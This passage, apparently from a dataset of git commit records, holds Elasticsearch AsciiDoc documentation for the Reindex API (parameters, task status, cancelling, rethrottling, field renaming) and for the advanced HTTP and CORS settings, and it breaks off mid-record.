Reindex API also\nsupports `refresh`, `wait_for_completion`, `consistency`, `timeout`, and\n`requests_per_second`.\n\nSending the `refresh` url parameter will cause all indexes to which the request\nwrote to be refreshed. This is different than the Index API's `refresh`\nparameter which causes just the shard that received the new data to be indexed.\n\nIf the request contains `wait_for_completion=false` then Elasticsearch will\nperform some preflight checks, launch the request, and then return a `task`\nwhich can be used with <<docs-reindex-task-api,Tasks APIs>> to cancel or get\nthe status of the task. For now, once the request is finished the task is gone\nand the only place to look for the ultimate result of the task is in the\nElasticsearch log file. This will be fixed soon.\n\n`consistency` controls how many copies of a shard must respond to each write\nrequest. `timeout` controls how long each write request waits for unavailable\nshards to become available. Both work exactly how they work in the\n<<docs-bulk,Bulk API>>.\n\n`requests_per_second` can be set to any decimal number (`1.4`, `6`, `1000`, etc)\nand throttles the number of requests per second that the reindex issues. The\nthrottling is done waiting between bulk batches so that it can manipulate the\nscroll timeout. The wait time is the difference between the time it took the\nbatch to complete and the time `requests_per_second * requests_in_the_batch`.\nSince the batch isn't broken into multiple bulk requests large batch sizes will\ncause Elasticsearch to create many requests and then wait for a while before\nstarting the next set. This is \"bursty\" instead of \"smooth\". The default is\n`unlimited` which is also the only non-number value that it accepts.\n\n[float]\n=== Response body\n\nThe JSON response looks like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 639,\n \"updated\": 0,\n \"created\": 123,\n \"batches\": 1,\n \"version_conflicts\": 2,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n }\n \"throttled_millis\": 0,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\n`took`::\n\nThe number of milliseconds from start to end of the whole operation.\n\n`updated`::\n\nThe number of documents that were successfully updated.\n\n`created`::\n\nThe number of documents that were successfully created.\n\n`batches`::\n\nThe number of scroll responses pulled back by the the reindex.\n\n`version_conflicts`::\n\nThe number of version conflicts that reindex hit.\n\n`retries`::\n\nThe number of retries attempted by reindex. `bulk` is the number of bulk\nactions retried and `search` is the number of search actions retried.\n\n`throttled_millis`::\n\nNumber of milliseconds the request slept to conform to `requests_per_second`.\n\n`failures`::\n\nArray of all indexing failures. If this is non-empty then the request aborted\nbecause of those failures. See `conflicts` for how to prevent version conflicts\nfrom aborting the operation.\n\n[float]\n[[docs-reindex-task-api]]\n=== Works with the Task API\n\nWhile Reindex is running you can fetch their status using the\n<<tasks,Task API>>:\n\n[source,js]\n--------------------------------------------------\nGET _tasks?detailed=true&actions=*reindex\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe responses looks like:\n\n[source,js]\n--------------------------------------------------\n{\n \"nodes\" : {\n \"r1A2WoRbTwKZ516z6NEs5A\" : {\n \"name\" : \"Tyrannus\",\n \"transport_address\" : \"127.0.0.1:9300\",\n \"host\" : \"127.0.0.1\",\n \"ip\" : \"127.0.0.1:9300\",\n \"attributes\" : {\n \"testattr\" : \"test\",\n \"portsfile\" : \"true\"\n },\n \"tasks\" : {\n \"r1A2WoRbTwKZ516z6NEs5A:36619\" : {\n \"node\" : \"r1A2WoRbTwKZ516z6NEs5A\",\n \"id\" : 36619,\n \"type\" : \"transport\",\n \"action\" : \"indices:data\/write\/reindex\",\n \"status\" : { <1>\n \"total\" : 6154,\n \"updated\" : 3500,\n \"created\" : 0,\n \"deleted\" : 0,\n \"batches\" : 4,\n \"version_conflicts\" : 0,\n \"noops\" : 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0\n },\n \"description\" : \"\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> this object contains the actual status. It is just like the response json\nwith the important addition of the `total` field. `total` is the total number\nof operations that the reindex expects to perform. You can estimate the\nprogress by adding the `updated`, `created`, and `deleted` fields. The request\nwill finish when their sum is equal to the `total` field.\n\n\n[float]\n[[docs-reindex-cancel-task-api]]\n=== Works with the Cancel Task API\n\nAny Reindex can be canceled using the <<tasks,Task Cancel API>>:\n\n[source,js]\n--------------------------------------------------\nPOST _tasks\/taskid:1\/_cancel\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nCancelation should happen quickly but might take a few seconds. The task status\nAPI above will continue to list the task until it is wakes to cancel itself.\n\n\n[float]\n[[docs-reindex-rethrottle]]\n=== Rethrottling\n\nThe value of `requests_per_second` can be changed on a running reindex using\nthe `_rethrottle` API:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\/taskid:1\/_rethrottle?requests_per_second=unlimited\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nJust like when setting it on the `_reindex` API `requests_per_second` can be\neither `unlimited` to disable throttling or any decimal number like `1.7` or\n`12` to throttle to that level. Rethrottling that speeds up the query takes\neffect immediately but rethrotting that slows down the query will take effect\non after completing the current batch. This prevents scroll timeouts.\n\n\n[float]\n=== Reindex to change the name of a field\n\n`_reindex` can be used to build a copy of an index with renamed fields. Say you\ncreate an index containing documents that look like this:\n\n[source,js]\n--------------------------------------------------\nPOST test\/test\/1?refresh\n{\n \"text\": \"words words\",\n \"flag\": \"foo\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nBut you don't like the name `flag` and want to replace it with `tag`.\n`_reindex` can create the other index for you:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"test\"\n },\n \"dest\": {\n \"index\": \"test2\"\n },\n \"script\": {\n \"inline\": \"ctx._source.tag = ctx._source.remove(\\\"flag\\\")\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nNow you can get the new document:\n\n[source,js]\n--------------------------------------------------\nGET test2\/test\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nand it'll look like:\n\n[source,js]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"1\",\n \"_index\": \"test2\",\n \"_type\": \"test\",\n \"_version\": 1,\n \"_source\": {\n \"text\": \"words words\",\n \"tag\": \"foo\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nOr you can search by `tag` or whatever you want.\n","old_contents":"[[docs-reindex]]\n== Reindex API\n\nexperimental[The reindex API is new and should still be considered experimental. The API may change in ways that are not backwards compatible]\n\nThe most basic form of `_reindex` just copies documents from one index to another.\nThis will copy documents from the `twitter` index into the `new_twitter` index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:big_twitter]\n\nThat will return something like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 147,\n \"timed_out\": false,\n \"created\": 120,\n \"updated\": 0,\n \"batches\": 1,\n \"version_conflicts\": 0,\n \"noops\": 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0,\n \"requests_per_second\": \"unlimited\",\n \"throttled_until_millis\": 0,\n \"total\": 120,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\" : 147\/\"took\" : \"$body.took\"\/]\n\nJust like <<docs-update-by-query,`_update_by_query`>>, `_reindex` gets a\nsnapshot of the source index but its target must be a **different** index so\nversion conflicts are unlikely. The `dest` element can be configured like the\nindex API to control optimistic concurrency control. Just leaving out\n`version_type` (as above) or setting it to `internal` will cause Elasticsearch\nto blindly dump documents into the target, overwriting any that happen to have\nthe same type and id:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"internal\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSetting `version_type` to `external` will cause Elasticsearch to preserve the\n`version` from the source, create any documents that are missing, and update\nany documents that have an older version in the destination index than they do\nin the source index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSettings `op_type` to `create` will cause `_reindex` to only create missing\ndocuments in the target index. All existing documents will cause a version\nconflict:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nBy default version conflicts abort the `_reindex` process but you can just\ncount them by settings `\"conflicts\": \"proceed\"` in the request body:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"conflicts\": \"proceed\",\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nYou can increase the default batch size by setting the `size` parameter (which defaults to `1000`) to the `source`. Note that it is different than the `size` parameter available at the root, which limits the number of documents (see below).\n\n[source,js]\n--------------------------------------------------\nPOST \/_reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"size\": 2000\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ AUTOSENSE\n\nYou can limit the documents by adding a type to the `source` or by adding a\nquery. This will only copy ++tweet++'s made by `kimchy` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\",\n \"query\": {\n \"term\": {\n \"user\": \"kimchy\"\n }\n }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\n`index` and `type` in `source` can both be lists, allowing you to copy from\nlots of sources in one request. This will copy documents from the `tweet` and\n`post` types in the `twitter` and `blog` index. It'd include the `post` type in\nthe `twitter` index and the `tweet` type in the `blog` index. If you want to be\nmore specific you'll need to use the `query`. It also makes no effort to handle\nID collisions. The target index will remain valid but it's not easy to predict\nwhich document will survive because the iteration order isn't well defined.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": [\"twitter\", \"blog\"],\n \"type\": [\"tweet\", \"post\"]\n },\n \"dest\": {\n \"index\": \"all_together\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT twitter\\nPUT blog\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nIt's also possible to limit the number of processed documents by setting\n`size`. This will only copy a single document from `twitter` to\n`new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 1,\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nIf you want a particular set of documents from the twitter index you'll\nneed to sort. Sorting makes the scroll less efficient but in some contexts\nit's worth it. If possible, prefer a more selective query to `size` and `sort`.\nThis will copy 10000 documents from `twitter` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 10000,\n \"source\": {\n \"index\": \"twitter\",\n \"sort\": { \"date\": \"desc\" }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nLike `_update_by_query`, `_reindex` supports a script that modifies the\ndocument. Unlike `_update_by_query`, the script is allowed to modify the\ndocument's metadata. This example bumps the version of the source document:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n },\n \"script\": {\n \"script\": \"if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nThink of the possibilities! Just be careful! With great power.... You can\nchange:\n\n * `_id`\n * `_type`\n * `_index`\n * `_version`\n * `_routing`\n * `_parent`\n * `_timestamp`\n * `_ttl`\n\nSetting `_version` to `null` or clearing it from the `ctx` map is just like not\nsending the version in an indexing request. It will cause that document to be\noverwritten in the target index regardless of the version on the target or the\nversion type you use in the `_reindex` request.\n\nBy default if `_reindex` sees a document with routing then the routing is\npreserved unless it's changed by the script. You can set `routing` on the\n`dest` request to change this:\n\n`keep`::\n\nSets the routing on the bulk request sent for each match to the routing on\nthe match. The default.\n\n`discard`::\n\nSets the routing on the bulk request sent for each match to null.\n\n`=<some text>`::\n\nSets the routing on the bulk request sent for each match to all text after\nthe `=`.\n\nFor example, you can use the following request to copy all documents from\nthe `source` index with the company name `cat` into the `dest` index with\nrouting set to `cat`.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"query\": {\n \"match\": {\n \"company\": \"cat\"\n }\n }\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nBy default `_reindex` uses scroll batches of 1000. You can change the\nbatch size with the `size` field in the `source` element:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"size\": 100\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nReindex can also use the <<ingest>> feature by specifying a\n`pipeline` like this:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\"\n },\n \"dest\": {\n \"index\": \"dest\",\n \"pipeline\": \"some_ingest_pipeline\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\n[float]\n=== URL Parameters\n\nIn addition to the standard parameters like `pretty`, the Reindex API also\nsupports `refresh`, `wait_for_completion`, `consistency`, `timeout`, and\n`requests_per_second`.\n\nSending the `refresh` url parameter will cause all indexes to which the request\nwrote to be refreshed. This is different than the Index API's `refresh`\nparameter which causes just the shard that received the new data to be indexed.\n\nIf the request contains `wait_for_completion=false` then Elasticsearch will\nperform some preflight checks, launch the request, and then return a `task`\nwhich can be used with <<docs-reindex-task-api,Tasks APIs>> to cancel or get\nthe status of the task. For now, once the request is finished the task is gone\nand the only place to look for the ultimate result of the task is in the\nElasticsearch log file. This will be fixed soon.\n\n`consistency` controls how many copies of a shard must respond to each write\nrequest. `timeout` controls how long each write request waits for unavailable\nshards to become available. Both work exactly how they work in the\n<<docs-bulk,Bulk API>>.\n\n`requests_per_second` can be set to any decimal number (`1.4`, `6`, `1000`, etc)\nand throttles the number of requests per second that the reindex issues. The\nthrottling is done waiting between bulk batches so that it can manipulate the\nscroll timeout. The wait time is the difference between the time it took the\nbatch to complete and the time `requests_per_second * requests_in_the_batch`.\nSince the batch isn't broken into multiple bulk requests large batch sizes will\ncause Elasticsearch to create many requests and then wait for a while before\nstarting the next set. This is \"bursty\" instead of \"smooth\". The default is\n`unlimited` which is also the only non-number value that it accepts.\n\n[float]\n=== Response body\n\nThe JSON response looks like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 639,\n \"updated\": 0,\n \"created\": 123,\n \"batches\": 1,\n \"version_conflicts\": 2,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n }\n \"throttled_millis\": 0,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\n`took`::\n\nThe number of milliseconds from start to end of the whole operation.\n\n`updated`::\n\nThe number of documents that were successfully updated.\n\n`created`::\n\nThe number of documents that were successfully created.\n\n`batches`::\n\nThe number of scroll responses pulled back by the the reindex.\n\n`version_conflicts`::\n\nThe number of version conflicts that reindex hit.\n\n`retries`::\n\nThe number of retries attempted by reindex. `bulk` is the number of bulk\nactions retried and `search` is the number of search actions retried.\n\n`throttled_millis`::\n\nNumber of milliseconds the request slept to conform to `requests_per_second`.\n\n`failures`::\n\nArray of all indexing failures. If this is non-empty then the request aborted\nbecause of those failures. See `conflicts` for how to prevent version conflicts\nfrom aborting the operation.\n\n[float]\n[[docs-reindex-task-api]]\n=== Works with the Task API\n\nWhile Reindex is running you can fetch their status using the\n<<tasks,Task API>>:\n\n[source,js]\n--------------------------------------------------\nGET _tasks?detailed=true&actions=*reindex\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe responses looks like:\n\n[source,js]\n--------------------------------------------------\n{\n \"nodes\" : {\n \"r1A2WoRbTwKZ516z6NEs5A\" : {\n \"name\" : \"Tyrannus\",\n \"transport_address\" : \"127.0.0.1:9300\",\n \"host\" : \"127.0.0.1\",\n \"ip\" : \"127.0.0.1:9300\",\n \"attributes\" : {\n \"testattr\" : \"test\",\n \"portsfile\" : \"true\"\n },\n \"tasks\" : {\n \"r1A2WoRbTwKZ516z6NEs5A:36619\" : {\n \"node\" : \"r1A2WoRbTwKZ516z6NEs5A\",\n \"id\" : 36619,\n \"type\" : \"transport\",\n \"action\" : \"indices:data\/write\/reindex\",\n \"status\" : { <1>\n \"total\" : 6154,\n \"updated\" : 3500,\n \"created\" : 0,\n \"deleted\" : 0,\n \"batches\" : 4,\n \"version_conflicts\" : 0,\n \"noops\" : 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0\n },\n \"description\" : \"\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> this object contains the actual status. It is just like the response json\nwith the important addition of the `total` field. `total` is the total number\nof operations that the reindex expects to perform. You can estimate the\nprogress by adding the `updated`, `created`, and `deleted` fields. The request\nwill finish when their sum is equal to the `total` field.\n\n\n[float]\n[[docs-reindex-cancel-task-api]]\n=== Works with the Cancel Task API\n\nAny Reindex can be canceled using the <<tasks,Task Cancel API>>:\n\n[source,js]\n--------------------------------------------------\nPOST _tasks\/taskid:1\/_cancel\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nCancelation should happen quickly but might take a few seconds. The task status\nAPI above will continue to list the task until it is wakes to cancel itself.\n\n\n[float]\n[[docs-reindex-rethrottle]]\n=== Rethrottling\n\nThe value of `requests_per_second` can be changed on a running reindex using\nthe `_rethrottle` API:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\/taskid:1\/_rethrottle?requests_per_second=unlimited\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nJust like when setting it on the `_reindex` API `requests_per_second` can be\neither `unlimited` to disable throttling or any decimal number like `1.7` or\n`12` to throttle to that level. Rethrottling that speeds up the query takes\neffect immediately but rethrotting that slows down the query will take effect\non after completing the current batch. This prevents scroll timeouts.\n\n\n[float]\n=== Reindex to change the name of a field\n\n`_reindex` can be used to build a copy of an index with renamed fields. Say you\ncreate an index containing documents that look like this:\n\n[source,js]\n--------------------------------------------------\nPOST test\/test\/1?refresh\n{\n \"text\": \"words words\",\n \"flag\": \"foo\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nBut you don't like the name `flag` and want to replace it with `tag`.\n`_reindex` can create the other index for you:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"test\"\n },\n \"dest\": {\n \"index\": \"test2\"\n },\n \"script\": {\n \"inline\": \"ctx._source.tag = ctx._source.remove(\\\"flag\\\")\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nNow you can get the new document:\n\n[source,js]\n--------------------------------------------------\nGET test2\/test\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nand it'll look like:\n\n[source,js]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"1\",\n \"_index\": \"test2\",\n \"_type\": \"test\",\n \"_version\": 1,\n \"_source\": {\n \"text\": \"words words\",\n \"tag\": \"foo\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nOr you can search by `tag` or whatever you want.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"579d0367b153693f40b58bcf9477684fe5abfac2","subject":"[DOCS] http.client_stats.enabled setting (#71188)","message":"[DOCS] http.client_stats.enabled setting (#71188)\n\n","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/modules\/http.asciidoc","new_file":"docs\/reference\/modules\/http.asciidoc","new_contents":"[[http-settings]]\n==== Advanced HTTP settings\n\nUse the following advanced settings to configure the HTTP interface\nindependently of the <<transport-settings,transport interface>>. You can also\nconfigure both interfaces together using the <<common-network-settings,network settings>>.\n\n`http.host`::\n(<<static-cluster-setting,Static>>)\nSets the address of this node for HTTP traffic. The node will bind to this\naddress and will also use it as its HTTP publish address. Accepts an IP\naddress, a hostname, or a <<network-interface-values,special value>>.\nUse this setting only if you require different configurations for the\ntransport and HTTP interfaces.\n+\nDefaults to the address given by `network.host`.\n\n`http.bind_host`::\n(<<static-cluster-setting,Static>>)\nThe network address(es) to which the node should bind in order to listen for\nincoming HTTP connections. Accepts a list of IP addresses, hostnames, and\n<<network-interface-values,special values>>. Defaults to the address given by\n`http.host` or `network.bind_host`. Use this setting only if you require to\nbind to multiple addresses or to use different addresses for publishing and\nbinding, and you also require different binding configurations for the\ntransport and HTTP interfaces.\n\n`http.publish_host`::\n(<<static-cluster-setting,Static>>)\nThe network address for HTTP clients to contact the node using sniffing.\nAccepts an IP address, a hostname, or a <<network-interface-values,special\nvalue>>. Defaults to the address given by `http.host` or\n`network.publish_host`. Use this setting only if you require to bind to\nmultiple addresses or to use different addresses for publishing and binding,\nand you also require different binding configurations for the transport and\nHTTP interfaces.\n\n`http.publish_port`::\n(<<static-cluster-setting,Static>>)\nThe port of the <<modules-network-binding-publishing,HTTP publish address>>.\nConfigure this setting only if you need the publish port to be different from\n`http.port`. Defaults to the port assigned via `http.port`.\n\n`http.max_content_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP request body. Defaults to `100mb`.\n\n`http.max_initial_line_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP URL. Defaults to `4kb`.\n\n`http.max_header_size`::\n(<<static-cluster-setting,Static>>)\nMaximum size of allowed headers. Defaults to `8kb`.\n\n[[http-compression]]\n\/\/ tag::http-compression-tag[]\n`http.compression` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nSupport for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`.\n+\nDisabling compression for HTTPS mitigates potential security risks, such as a\n{wikipedia}\/BREACH[BREACH attack]. To compress HTTPS traffic,\nyou must explicitly set `http.compression` to `true`.\n\/\/ end::http-compression-tag[]\n\n`http.compression_level`::\n(<<static-cluster-setting,Static>>)\nDefines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`.\n\n[[http-cors-enabled]]\n\/\/ tag::http-cors-enabled-tag[]\n`http.cors.enabled` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nEnable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight\n{wikipedia}\/Cross-origin_resource_sharing[CORS] requests.\n{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header.\n+\nNOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the\n`Access-Control-Allow-Origin` response header, then cross-origin security is\ncompromised. If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing.\n\n\/\/ end::http-cors-enabled-tag[]\n\n[[http-cors-allow-origin]]\n\/\/ tag::http-cors-allow-origin-tag[]\n`http.cors.allow-origin` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich origins to allow. If you prepend and append a forward slash (`\/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `\/https?:\\\/\\\/localhost(:[0-9]+)?\/` would return the request header appropriately in both cases. Defaults to no origins allowed.\n+\nIMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*.\n\n\/\/ end::http-cors-allow-origin-tag[]\n\n[[http-cors-max-age]]\n\/\/ tag::http-cors-max-age-tag[]\n`http.cors.max-age` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nBrowsers send a \"preflight\" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days).\n\/\/ end::http-cors-max-age-tag[]\n\n[[http-cors-allow-methods]]\n\/\/ tag::http-cors-allow-methods-tag[]\n`http.cors.allow-methods` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`.\n\/\/ end::http-cors-allow-methods-tag[]\n\n[[http-cors-allow-headers]]\n\/\/ tag::http-cors-allow-headers-tag[]\n`http.cors.allow-headers` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`.\n\/\/ end::http-cors-allow-headers-tag[]\n\n[[http-cors-allow-credentials]]\n\/\/ tag::http-cors-allow-credentials-tag[]\n`http.cors.allow-credentials` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`.\n+\nNOTE: This header is only returned when the setting is set to `true`.\n\n\/\/ end::http-cors-allow-credentials-tag[]\n\n`http.detailed_errors.enabled`::\n(<<static-cluster-setting,Static>>)\nIf `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`.\n+\nIf `false`, use the `error_trace` parameter to <<common-options-error-options,enable stack traces>> and return detailed error messages. Otherwise, only a simple message will be returned.\n\n`http.pipelining.max_events`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`.\n\n`http.max_warning_header_count`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.max_warning_header_size`::\n(<<static-cluster-setting,Static>>)\nThe maximum total size of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.tcp.no_delay`::\n(<<static-cluster-setting,Static>>)\nEnable or disable the {wikipedia}\/Nagle%27s_algorithm[TCP no delay]\nsetting. Defaults to `network.tcp.no_delay`.\n\n`http.tcp.keep_alive`::\n(<<static-cluster-setting,Static>>)\nConfigures the `SO_KEEPALIVE` option for this socket, which\ndetermines whether it sends TCP keepalive probes.\nDefaults to `network.tcp.keep_alive`.\n\n`http.tcp.keep_idle`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPIDLE` option for this socket, which\ndetermines the time in seconds that a connection must be idle before\nstarting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which\nuses the system default. This value cannot exceed `300` seconds. Only applicable on\nLinux and macOS, and requires Java 11 or newer.\n\n`http.tcp.keep_interval`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPINTVL` option for this socket,\nwhich determines the time in seconds between sending TCP keepalive probes.\nDefaults to `network.tcp.keep_interval`, which uses the system default.\nThis value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires\nJava 11 or newer.\n\n`http.tcp.keep_count`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPCNT` option for this socket, which\ndetermines the number of unacknowledged TCP keepalive probes that may be\nsent on a connection before it is dropped. Defaults to `network.tcp.keep_count`,\nwhich uses the system default. Only applicable on Linux and macOS, and\nrequires Java 11 or newer.\n\n`http.tcp.reuse_address`::\n(<<static-cluster-setting,Static>>)\nShould an address be reused or not. Defaults to `network.tcp.reuse_address`.\n\n`http.tcp.send_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP send buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.send_buffer_size`.\n\n`http.tcp.receive_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP receive buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.receive_buffer_size`.\n\n`http.client_stats.enabled`::\n(<<dynamic-cluster-setting,Dynamic>>)\nEnable or disable collection of HTTP client stats. Defaults to `true`.\n","old_contents":"[[http-settings]]\n==== Advanced HTTP settings\n\nUse the following advanced settings to configure the HTTP interface\nindependently of the <<transport-settings,transport interface>>. You can also\nconfigure both interfaces together using the <<common-network-settings,network settings>>.\n\n`http.host`::\n(<<static-cluster-setting,Static>>)\nSets the address of this node for HTTP traffic. The node will bind to this\naddress and will also use it as its HTTP publish address. Accepts an IP\naddress, a hostname, or a <<network-interface-values,special value>>.\nUse this setting only if you require different configurations for the\ntransport and HTTP interfaces.\n+\nDefaults to the address given by `network.host`.\n\n`http.bind_host`::\n(<<static-cluster-setting,Static>>)\nThe network address(es) to which the node should bind in order to 